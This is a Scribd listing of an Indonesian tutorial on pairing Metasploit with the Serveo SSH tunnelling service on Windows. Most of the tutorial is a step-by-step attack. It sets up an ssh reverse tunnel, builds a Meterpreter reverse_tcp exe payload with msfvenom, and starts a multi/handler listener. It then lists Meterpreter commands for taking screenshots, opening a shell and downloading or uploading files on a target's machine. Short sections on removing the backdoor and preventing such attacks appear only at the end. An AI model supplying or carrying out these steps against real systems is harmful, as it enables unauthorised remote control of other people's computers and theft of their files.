0% menganggap dokumen ini bermanfaat (0 suara)
21 tayangan3 halaman

Metasploit dan Serveo di Windows

Buku ini menjelaskan cara menginstal dan menggunakan Metasploit bersama Serveo di Windows untuk pengujian keamanan. Proses mencakup instalasi Metasploit, konfigurasi Serveo untuk port forwarding, pembuatan payload, dan menjalankan listener di Metasploit. Selain itu, buku ini juga memberikan langkah-langkah untuk menghentikan listener dan menghapus backdoor dari target serta cara mencegah serangan.

Diunggah oleh

Anwer Ghozi
Hak Cipta
© All Rights Reserved
Kami menangani hak cipta konten dengan serius. Jika Anda merasa konten ini milik Anda, ajukan klaim di sini.
Format Tersedia
Unduh sebagai DOCX, PDF, TXT atau baca online di Scribd
0% menganggap dokumen ini bermanfaat (0 suara)
21 tayangan3 halaman

Metasploit dan Serveo di Windows

Buku ini menjelaskan cara menginstal dan menggunakan Metasploit bersama Serveo di Windows untuk pengujian keamanan. Proses mencakup instalasi Metasploit, konfigurasi Serveo untuk port forwarding, pembuatan payload, dan menjalankan listener di Metasploit. Selain itu, buku ini juga memberikan langkah-langkah untuk menghentikan listener dan menghapus backdoor dari target serta cara mencegah serangan.

Diunggah oleh

Anwer Ghozi
Hak Cipta
© All Rights Reserved
Kami menangani hak cipta konten dengan serius. Jika Anda merasa konten ini milik Anda, ajukan klaim di sini.
Format Tersedia
Unduh sebagai DOCX, PDF, TXT atau baca online di Scribd

Buku Materi: Penggunaan Metasploit

dengan Serveo di Windows


1. Pendahuluan
Metasploit adalah framework untuk pengujian keamanan, sedangkan Serveo adalah layanan
SSH tunneling yang memungkinkan perangkat dapat diakses dari luar jaringan lokal.

Buku ini menjelaskan cara menginstal dan menggunakan Metasploit + Serveo di Windows.

2. Instalasi & Persiapan


2.1 Instal Metasploit di Windows

1. Unduh Metasploit dari situs resminya


o Buka [Link]
o Unduh Metasploit Windows Installer
2. Install Metasploit
o Jalankan file .exe yang sudah diunduh.
o Ikuti proses instalasi hingga selesai.
3. Jalankan Metasploit Console
o Buka Command Prompt (cmd) sebagai administrator.
o Masukkan perintah:
o msfconsole

3. Konfigurasi Serveo di Windows


Karena Serveo berbasis SSH, kita membutuhkan klien SSH di Windows.

3.1 Instal OpenSSH untuk Windows

1. Buka PowerShell sebagai administrator.


2. Jalankan perintah:
3. Add-WindowsFeature -Name OpenSSH-Server
4. Jika sudah terinstal, jalankan layanan SSH dengan:
5. Start-Service sshd
6. Pastikan layanan berjalan:
7. Get-Service sshd

3.2 Jalankan Serveo untuk Port Forwarding

Setelah OpenSSH terinstal, kita bisa menjalankan Serveo.

1. Cek IP lokal Windows


o Buka Command Prompt (cmd)
o Jalankan:
o ipconfig
oCatat IPv4 Address yang biasanya dalam format 192.168.x.x.
2. Jalankan Serveo untuk port forwarding
o Masukkan perintah berikut di Command Prompt:
o ssh -R 4444:192.168.x.x:4444 [Link]
o Ganti 192.168.x.x dengan IP lokal Windows-mu!

4. Membuat Payload Metasploit di Windows


Setelah Serveo aktif, kita buat payload yang akan digunakan untuk mengakses perangkat
target.

1. Buka Metasploit Console


2. msfconsole
3. Buat payload untuk Windows
4. msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Link]
LPORT=4444 -f exe > [Link]

5. Menjalankan Listener di Metasploit


Setelah payload dibuat dan dikirim ke target, kita harus menjalankan listener agar bisa
menerima koneksi dari target.

1. Buka Metasploit di Windows


2. msfconsole
3. Gunakan exploit multi-handler
4. use exploit/multi/handler
5. Tentukan payload yang digunakan
6. set payload windows/meterpreter/reverse_tcp
7. Atur LHOST dan LPORT
8. set LHOST [Link]
9. set LPORT 4444
10. Jalankan listener
11. exploit

Jika target menjalankan [Link], sesi Meterpreter akan terbuka.

6. Perintah Penting di Meterpreter


 Cek sesi aktif
 sessions -i
 Ambil screenshot dari target
 screenshot
 Buka shell target
 shell
 Melihat daftar file target
 ls
 Download file dari target
 download namafile
 Upload file ke target
 upload namafile

7. Penutupan dan Pencegahan


7.1 Menghentikan Listener

Jika ingin menghentikan listener di Metasploit, gunakan:

exit

7.2 Menghapus Backdoor dari Target

 Buka Task Manager, cari proses mencurigakan, lalu hentikan.


 Hapus [Link] secara manual.
 Gunakan Windows Defender untuk memindai ancaman.

7.3 Cara Mencegah Serangan Metasploit

 Jangan menjalankan file .exe dari sumber tidak dikenal.


 Gunakan firewall untuk mencegah akses luar.
 Periksa lalu lintas jaringan dengan Wireshark.

8. Kesimpulan
Buku ini membahas cara menggunakan Metasploit di Windows dengan Serveo untuk
pengujian keamanan. Teknik ini bisa disalahgunakan, jadi pastikan untuk memahami juga
cara melindungi perangkat dari serangan serupa.

Anda mungkin juga menyukai